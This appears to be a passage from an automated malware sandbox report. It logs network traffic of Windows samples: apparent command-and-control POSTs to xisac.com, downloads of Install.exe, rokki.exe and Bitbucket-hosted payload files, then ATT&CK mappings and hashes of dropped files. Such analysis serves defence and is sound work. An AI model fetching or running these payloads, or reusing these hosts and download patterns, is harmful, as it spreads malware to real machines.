Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ksoowwijrc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 167
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 47
Connection: close
Content-Type: text/html; charset=utf-8
DNS

crazytree0021.ga

Remote address:

8.8.8.8:53

Request

crazytree0021.ga

IN A

Response

crazytree0021.ga

IN A

67.223.118.49
DNS

crazytree0021.ga

Remote address:

8.8.8.8:53

Request

crazytree0021.ga

IN A

Response

crazytree0021.ga

IN A

67.223.118.49
GET

http://crazytree0021.ga/Install.exe

Remote address:

67.223.118.49:80

Request

GET /Install.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: crazytree0021.ga

Response

HTTP/1.1 301 Moved Permanently

keep-alive: timeout=5, max=100
content-type: text/html
content-length: 707
date: Sat, 17 Dec 2022 05:36:25 GMT
server: LiteSpeed
location: https://crazytree0021.ga/Install.exe
x-turbo-charged-by: LiteSpeed
GET

https://crazytree0021.ga/Install.exe

Remote address:

67.223.118.49:443

Request

GET /Install.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: crazytree0021.ga

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Fri, 16 Dec 2022 21:30:54 GMT
accept-ranges: bytes
content-length: 1425552
date: Sat, 17 Dec 2022 05:36:26 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sgpss.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 195
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:29 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hdujly.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 134
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
DNS

plrrbgi5j5jkco.n1q2e0xzoz

6E5B.exe

Remote address:

8.8.8.8:53

Request

plrrbgi5j5jkco.n1q2e0xzoz

IN A

Response
DNS

bitbucket.org

6E5B.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

104.192.141.1
GET

https://bitbucket.org/alfolod79597/advapi32/downloads/library.bin

6E5B.exe

Remote address:

104.192.141.1:443

Request

GET /alfolod79597/advapi32/downloads/library.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Host: bitbucket.org

Response

HTTP/1.1 302 Found

content-security-policy-report-only: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 999346.653
vary: Accept-Language, Origin
x-usage-request-cost: 662.27
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: fba969353155eae1
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Sat, 17 Dec 2022 05:36:39 GMT
x-usage-user-time: 0.019813
x-usage-system-time: 0.000055
location: https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/eb637829-d1d6-461f-a264-390bb46b05f3/library.bin?response-content-disposition=attachment%3B%20filename%3D%22library.bin%22&AWSAccessKeyId=ASIA6KOSE3BNDYQAGKZK&Signature=UlCD0zwGfTfpAIZe3K%2BXAKvYo34%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDNH2fJOkhLQjfn4vNCK%2BAYruqvlJk8hE%2BE%2Bj%2B92o3zwteR3ex4NZOBlfWT4Z%2FMbeFHeCQmsDMoWvILgiQBL8ogune5%2BYdmlZkfqdDE4OsDMexzZp8aX2WB56J8PFXFmyw16GfHvaBodWeKiKrrG70TwTbW3ASycgh6gH77dPmNWEiPLdN%2B%2BJYGy4p6U3NAq%2FOc4n6IkamY4kBeYtVOczdAOhs%2Bc4o10%2BWoevPXs9O02UZhKK1EWbaE5A0PGGT4tafRQKoltXA5qZ7%2FBfEvYo0Kb1nAYyLXcY2Kw4jm7glxAdYhZMXR04AwjElcwUseheLpGeYaYPlC1l5AUVOqGhVaAAPA%3D%3D&Expires=1671256664
expires: Sat, 17 Dec 2022 05:36:39 GMT
x-served-by: 8cb62b7fbc57
x-envoy-upstream-service-time: 38
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: e369ba7c8e0e
x-render-time: 0.030530214309692383
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: e369ba7c8e0e
x-request-count: 2489
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET

https://bitbucket.org/alfolod79597/advapi32/downloads/resource.bin

6E5B.exe

Remote address:

104.192.141.1:443

Request

GET /alfolod79597/advapi32/downloads/resource.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Host: bitbucket.org

Response

HTTP/1.1 302 Found

content-security-policy-report-only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 998985.265
vary: Accept-Language, Origin
x-usage-request-cost: 721.60
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: 72d489ff31a8327b
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Sat, 17 Dec 2022 05:36:41 GMT
x-usage-user-time: 0.017193
x-usage-system-time: 0.004455
location: https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/564562df-1515-4577-ba75-5f851607c900/resource.bin?response-content-disposition=attachment%3B%20filename%3D%22resource.bin%22&AWSAccessKeyId=ASIA6KOSE3BNJ5QWZFOU&Signature=xmAOsDAQVhVicsI6ycZhLBxF6ho%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDMG1NEMOearheio%2BNyK%2BAbUk7cZyMGcaZNodnzBLuanu4I67hcF434Kmb%2FSllXQDMAYM3neGWpmFpBs5Udn5alP5fu%2BvxiIwGSkyw28FHzO3gmjxx8qCGhHEM%2F6Bb%2Fn%2F9t0zLkakj%2BnvDg270OljtRL8ndbO5OlkuWtw43XFs1UjSjEl6JWuYbxQvqLip3wD1zk4wh0RYRSwnclFZQ7IDqRs%2B074E3xrNa%2FxTlmGf15BrFYArUlbpLgtria1WFW0dB36pZZWEJPEGXwILM0o7qj1nAYyLW%2F090a3MQ9SzLCs9xhtYJMSxUxhTDQdqRy0bFUVFcUcV7qCywVf121zkMonng%3D%3D&Expires=1671256950
expires: Sat, 17 Dec 2022 05:36:40 GMT
x-served-by: a644d226e282
x-envoy-upstream-service-time: 48
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: e369ba7c8e0e
x-render-time: 0.036691904067993164
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: e369ba7c8e0e
x-request-count: 2628
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
DNS

bbuseruploads.s3.amazonaws.com

6E5B.exe

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

54.231.198.217

s3-w.us-east-1.amazonaws.com

IN A

54.231.172.177

s3-w.us-east-1.amazonaws.com

IN A

52.217.88.52

s3-w.us-east-1.amazonaws.com

IN A

54.231.140.57

s3-w.us-east-1.amazonaws.com

IN A

52.217.170.249

s3-w.us-east-1.amazonaws.com

IN A

52.217.76.252

s3-w.us-east-1.amazonaws.com

IN A

52.217.235.97

s3-w.us-east-1.amazonaws.com

IN A

54.231.203.129
GET

https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/eb637829-d1d6-461f-a264-390bb46b05f3/library.bin?response-content-disposition=attachment%3B%20filename%3D%22library.bin%22&AWSAccessKeyId=ASIA6KOSE3BNDYQAGKZK&Signature=UlCD0zwGfTfpAIZe3K%2BXAKvYo34%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDNH2fJOkhLQjfn4vNCK%2BAYruqvlJk8hE%2BE%2Bj%2B92o3zwteR3ex4NZOBlfWT4Z%2FMbeFHeCQmsDMoWvILgiQBL8ogune5%2BYdmlZkfqdDE4OsDMexzZp8aX2WB56J8PFXFmyw16GfHvaBodWeKiKrrG70TwTbW3ASycgh6gH77dPmNWEiPLdN%2B%2BJYGy4p6U3NAq%2FOc4n6IkamY4kBeYtVOczdAOhs%2Bc4o10%2BWoevPXs9O02UZhKK1EWbaE5A0PGGT4tafRQKoltXA5qZ7%2FBfEvYo0Kb1nAYyLXcY2Kw4jm7glxAdYhZMXR04AwjElcwUseheLpGeYaYPlC1l5AUVOqGhVaAAPA%3D%3D&Expires=1671256664

6E5B.exe

Remote address:

54.231.198.217:443

Request

GET /b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/eb637829-d1d6-461f-a264-390bb46b05f3/library.bin?response-content-disposition=attachment%3B%20filename%3D%22library.bin%22&AWSAccessKeyId=ASIA6KOSE3BNDYQAGKZK&Signature=UlCD0zwGfTfpAIZe3K%2BXAKvYo34%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDNH2fJOkhLQjfn4vNCK%2BAYruqvlJk8hE%2BE%2Bj%2B92o3zwteR3ex4NZOBlfWT4Z%2FMbeFHeCQmsDMoWvILgiQBL8ogune5%2BYdmlZkfqdDE4OsDMexzZp8aX2WB56J8PFXFmyw16GfHvaBodWeKiKrrG70TwTbW3ASycgh6gH77dPmNWEiPLdN%2B%2BJYGy4p6U3NAq%2FOc4n6IkamY4kBeYtVOczdAOhs%2Bc4o10%2BWoevPXs9O02UZhKK1EWbaE5A0PGGT4tafRQKoltXA5qZ7%2FBfEvYo0Kb1nAYyLXcY2Kw4jm7glxAdYhZMXR04AwjElcwUseheLpGeYaYPlC1l5AUVOqGhVaAAPA%3D%3D&Expires=1671256664 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: 0qsm+mYNdcw9mBXSmgiRpWCk9byPtBOkGCmPbW6R96Wk96jxe+eqb/oYhWABJNUv152KWcjfXnk=
x-amz-request-id: 91QFSJBQ3DXXGDW9
Date: Sat, 17 Dec 2022 05:36:41 GMT
Last-Modified: Fri, 16 Dec 2022 23:39:01 GMT
ETag: "7d4e3c6e7b78c36622896709419f111c"
x-amz-server-side-encryption: AES256
x-amz-version-id: UgNUu3qT9h1SQ_9Q6kQbQeH2AI6V_5zR
Content-Disposition: attachment; filename="library.bin"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Server: AmazonS3
Content-Length: 268288
GET

https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/564562df-1515-4577-ba75-5f851607c900/resource.bin?response-content-disposition=attachment%3B%20filename%3D%22resource.bin%22&AWSAccessKeyId=ASIA6KOSE3BNJ5QWZFOU&Signature=xmAOsDAQVhVicsI6ycZhLBxF6ho%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDMG1NEMOearheio%2BNyK%2BAbUk7cZyMGcaZNodnzBLuanu4I67hcF434Kmb%2FSllXQDMAYM3neGWpmFpBs5Udn5alP5fu%2BvxiIwGSkyw28FHzO3gmjxx8qCGhHEM%2F6Bb%2Fn%2F9t0zLkakj%2BnvDg270OljtRL8ndbO5OlkuWtw43XFs1UjSjEl6JWuYbxQvqLip3wD1zk4wh0RYRSwnclFZQ7IDqRs%2B074E3xrNa%2FxTlmGf15BrFYArUlbpLgtria1WFW0dB36pZZWEJPEGXwILM0o7qj1nAYyLW%2F090a3MQ9SzLCs9xhtYJMSxUxhTDQdqRy0bFUVFcUcV7qCywVf121zkMonng%3D%3D&Expires=1671256950

6E5B.exe

Remote address:

54.231.198.217:443

Request

GET /b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/564562df-1515-4577-ba75-5f851607c900/resource.bin?response-content-disposition=attachment%3B%20filename%3D%22resource.bin%22&AWSAccessKeyId=ASIA6KOSE3BNJ5QWZFOU&Signature=xmAOsDAQVhVicsI6ycZhLBxF6ho%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDMG1NEMOearheio%2BNyK%2BAbUk7cZyMGcaZNodnzBLuanu4I67hcF434Kmb%2FSllXQDMAYM3neGWpmFpBs5Udn5alP5fu%2BvxiIwGSkyw28FHzO3gmjxx8qCGhHEM%2F6Bb%2Fn%2F9t0zLkakj%2BnvDg270OljtRL8ndbO5OlkuWtw43XFs1UjSjEl6JWuYbxQvqLip3wD1zk4wh0RYRSwnclFZQ7IDqRs%2B074E3xrNa%2FxTlmGf15BrFYArUlbpLgtria1WFW0dB36pZZWEJPEGXwILM0o7qj1nAYyLW%2F090a3MQ9SzLCs9xhtYJMSxUxhTDQdqRy0bFUVFcUcV7qCywVf121zkMonng%3D%3D&Expires=1671256950 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: B/CodEv4PpiwaoiIAKT74x9NCxd0qSePrwyPMDjFAr4Zu7xPxI9Tb6YSv7gumeDmXkLN2HTZXtw=
x-amz-request-id: SEBMS2KQJ1W02DYT
Date: Sat, 17 Dec 2022 05:36:42 GMT
Last-Modified: Thu, 15 Dec 2022 10:35:56 GMT
ETag: "386d0e1f6d613a9698294492a824d99b"
x-amz-server-side-encryption: AES256
x-amz-version-id: g_hi_0qdDra6bDJRliFGMfaRkTRYaccO
Content-Disposition: attachment; filename="resource.bin"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Server: AmazonS3
Content-Length: 164864

91.195.240.101:80

http://dowe.at/tmp/

http

813 B
545 B
7
6

HTTP Request

POST http://dowe.at/tmp/

HTTP Response

403
211.171.233.126:80

http://xisac.com/tmp/

http

903 B
465 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

697 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

898 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

859 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

692 B
500 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
149.3.170.140:80

http://149.3.170.140/rokki.exe

http

104.1kB
6.0MB
2245
4306

HTTP Request

GET http://149.3.170.140/rokki.exe

HTTP Response

200
20.44.10.122:443

322 B
7
211.171.233.126:80

http://xisac.com/tmp/

http

668 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

843 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

864 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

765 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

894 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
93.184.221.240:80

322 B
7
211.171.233.126:80

http://xisac.com/tmp/

http

815 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

751 B
505 B
7
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
67.223.118.49:80

http://crazytree0021.ga/Install.exe

http

441 B
1.1kB
6
4

HTTP Request

GET http://crazytree0021.ga/Install.exe

HTTP Response

301
67.223.118.49:443

https://crazytree0021.ga/Install.exe

tls, http

25.6kB
1.5MB
546
1063

HTTP Request

GET https://crazytree0021.ga/Install.exe

HTTP Response

200
127.0.0.1:13922

rundll32.exe
127.0.0.1:1312

rundll32.exe
211.171.233.126:80

http://xisac.com/tmp/

http

774 B
790 B
7
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
211.171.233.126:80

http://xisac.com/tmp/

http

668 B
790 B
6
5

HTTP Request

POST http://xisac.com/tmp/

HTTP Response

404
104.192.141.1:443

https://bitbucket.org/alfolod79597/advapi32/downloads/resource.bin

tls, http

6E5B.exe

1.6kB
9.8kB
17
15

HTTP Request

GET https://bitbucket.org/alfolod79597/advapi32/downloads/library.bin

HTTP Response

302

HTTP Request

GET https://bitbucket.org/alfolod79597/advapi32/downloads/resource.bin

HTTP Response

302
54.231.198.217:443

https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/564562df-1515-4577-ba75-5f851607c900/resource.bin?response-content-disposition=attachment%3B%20filename%3D%22resource.bin%22&AWSAccessKeyId=ASIA6KOSE3BNJ5QWZFOU&Signature=xmAOsDAQVhVicsI6ycZhLBxF6ho%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDMG1NEMOearheio%2BNyK%2BAbUk7cZyMGcaZNodnzBLuanu4I67hcF434Kmb%2FSllXQDMAYM3neGWpmFpBs5Udn5alP5fu%2BvxiIwGSkyw28FHzO3gmjxx8qCGhHEM%2F6Bb%2Fn%2F9t0zLkakj%2BnvDg270OljtRL8ndbO5OlkuWtw43XFs1UjSjEl6JWuYbxQvqLip3wD1zk4wh0RYRSwnclFZQ7IDqRs%2B074E3xrNa%2FxTlmGf15BrFYArUlbpLgtria1WFW0dB36pZZWEJPEGXwILM0o7qj1nAYyLW%2F090a3MQ9SzLCs9xhtYJMSxUxhTDQdqRy0bFUVFcUcV7qCywVf121zkMonng%3D%3D&Expires=1671256950

tls, http

6E5B.exe

18.0kB
454.8kB
343
341

HTTP Request

GET https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/eb637829-d1d6-461f-a264-390bb46b05f3/library.bin?response-content-disposition=attachment%3B%20filename%3D%22library.bin%22&AWSAccessKeyId=ASIA6KOSE3BNDYQAGKZK&Signature=UlCD0zwGfTfpAIZe3K%2BXAKvYo34%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDNH2fJOkhLQjfn4vNCK%2BAYruqvlJk8hE%2BE%2Bj%2B92o3zwteR3ex4NZOBlfWT4Z%2FMbeFHeCQmsDMoWvILgiQBL8ogune5%2BYdmlZkfqdDE4OsDMexzZp8aX2WB56J8PFXFmyw16GfHvaBodWeKiKrrG70TwTbW3ASycgh6gH77dPmNWEiPLdN%2B%2BJYGy4p6U3NAq%2FOc4n6IkamY4kBeYtVOczdAOhs%2Bc4o10%2BWoevPXs9O02UZhKK1EWbaE5A0PGGT4tafRQKoltXA5qZ7%2FBfEvYo0Kb1nAYyLXcY2Kw4jm7glxAdYhZMXR04AwjElcwUseheLpGeYaYPlC1l5AUVOqGhVaAAPA%3D%3D&Expires=1671256664

HTTP Response

200

HTTP Request

GET https://bbuseruploads.s3.amazonaws.com/b3cc183f-88be-421a-8073-2dfb788a6ac6/downloads/564562df-1515-4577-ba75-5f851607c900/resource.bin?response-content-disposition=attachment%3B%20filename%3D%22resource.bin%22&AWSAccessKeyId=ASIA6KOSE3BNJ5QWZFOU&Signature=xmAOsDAQVhVicsI6ycZhLBxF6ho%3D&x-amz-security-token=FwoGZXIvYXdzEP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDMG1NEMOearheio%2BNyK%2BAbUk7cZyMGcaZNodnzBLuanu4I67hcF434Kmb%2FSllXQDMAYM3neGWpmFpBs5Udn5alP5fu%2BvxiIwGSkyw28FHzO3gmjxx8qCGhHEM%2F6Bb%2Fn%2F9t0zLkakj%2BnvDg270OljtRL8ndbO5OlkuWtw43XFs1UjSjEl6JWuYbxQvqLip3wD1zk4wh0RYRSwnclFZQ7IDqRs%2B074E3xrNa%2FxTlmGf15BrFYArUlbpLgtria1WFW0dB36pZZWEJPEGXwILM0o7qj1nAYyLW%2F090a3MQ9SzLCs9xhtYJMSxUxhTDQdqRy0bFUVFcUcV7qCywVf121zkMonng%3D%3D&Expires=1671256950

HTTP Response

200

8.8.8.8:53

dowe.at

dns

53 B
69 B
1
1

DNS Request

dowe.at

DNS Response

91.195.240.101
8.8.8.8:53

xisac.com

dns

55 B
215 B
1
1

DNS Request

xisac.com

DNS Response

211.171.233.126

181.94.48.228

222.236.49.123

138.36.3.134

201.124.230.1

190.219.54.242

58.235.189.192

109.102.255.230

211.119.84.112

37.34.248.24
8.8.8.8:53

crazytree0021.ga

dns

124 B
156 B
2
2

DNS Request

crazytree0021.ga

DNS Request

crazytree0021.ga

DNS Response

67.223.118.49

DNS Response

67.223.118.49
8.8.8.8:53

plrrbgi5j5jkco.n1q2e0xzoz

dns

6E5B.exe

71 B
146 B
1
1

DNS Request

plrrbgi5j5jkco.n1q2e0xzoz
8.8.8.8:53

bitbucket.org

dns

6E5B.exe

59 B
75 B
1
1

DNS Request

bitbucket.org

DNS Response

104.192.141.1
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

6E5B.exe

76 B
254 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

54.231.198.217

54.231.172.177

52.217.88.52

54.231.140.57

52.217.170.249

52.217.76.252

52.217.235.97

54.231.203.129

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\21EF.exe

Filesize
5.6MB

MD5
7bca245090dace95e87bb3d9b230c4d7

SHA1
83e13902c00fd1a621dcd96a36c8862ff0b61606

SHA256
ba21117d135d43225c06751e0b8ac91522b765442984d097cedcd7386ab81dac

SHA512
f306d838e4380c516aed968aaea87524d4ccf6bad9a17d85a3f8f8fa6d90042b8b2d8e67d3aff4bda63ee5759a6369a7d5aca3aaa97e0d5c5f8149c79ecb2abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\21EF.exe

Filesize
5.6MB

MD5
7bca245090dace95e87bb3d9b230c4d7

SHA1
83e13902c00fd1a621dcd96a36c8862ff0b61606

SHA256
ba21117d135d43225c06751e0b8ac91522b765442984d097cedcd7386ab81dac

SHA512
f306d838e4380c516aed968aaea87524d4ccf6bad9a17d85a3f8f8fa6d90042b8b2d8e67d3aff4bda63ee5759a6369a7d5aca3aaa97e0d5c5f8149c79ecb2abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\6E5B.exe

Filesize
1.4MB

MD5
1ea8aaf997bbebac62ec8031d9304100

SHA1
e8b7a1aeae449fc28310c8244bc6940d94adabb6

SHA256
bf52f8def7e804055268e9f17bd8fc91edea479e7d719f9335035bfc71ef21bd

SHA512
04217d1f733e56ce32aa96758941ebd6171242f7ff3f7ed8694247aae61a9b6d1b2fa1d0477612acda5a60a32f47af690dce7fdc4c388d337ddf5fce12335b96

Download Submit
C:\Users\Admin\AppData\Local\Temp\6E5B.exe

Filesize
1.4MB

MD5
1ea8aaf997bbebac62ec8031d9304100

SHA1
e8b7a1aeae449fc28310c8244bc6940d94adabb6

SHA256
bf52f8def7e804055268e9f17bd8fc91edea479e7d719f9335035bfc71ef21bd

SHA512
04217d1f733e56ce32aa96758941ebd6171242f7ff3f7ed8694247aae61a9b6d1b2fa1d0477612acda5a60a32f47af690dce7fdc4c388d337ddf5fce12335b96

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe

Filesize
2.4MB

MD5
e7053575255acd45d4213d866123dbaf

SHA1
95fa5a2178eb1dd6a445685b3ab2905c11045d0c

SHA256
794be0b98421623959185a060092be697fa695a73268ab8a46c7ab12655df62b

SHA512
e934ae1bb4cef1e71cf1905655bcb5979f8f70944817de88204d8bebf3a36300b7b282d0bd711cc41ae5e69f91b6e14576b7a8098ee283d29bdb451d98238401

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe

Filesize
2.4MB

MD5
e7053575255acd45d4213d866123dbaf

SHA1
95fa5a2178eb1dd6a445685b3ab2905c11045d0c

SHA256
794be0b98421623959185a060092be697fa695a73268ab8a46c7ab12655df62b

SHA512
e934ae1bb4cef1e71cf1905655bcb5979f8f70944817de88204d8bebf3a36300b7b282d0bd711cc41ae5e69f91b6e14576b7a8098ee283d29bdb451d98238401

Download Submit
\Users\Admin\AppData\Local\Temp\advapi32.dll

Filesize
262KB

MD5
564c99014ae888f17308f74816badcd6

SHA1
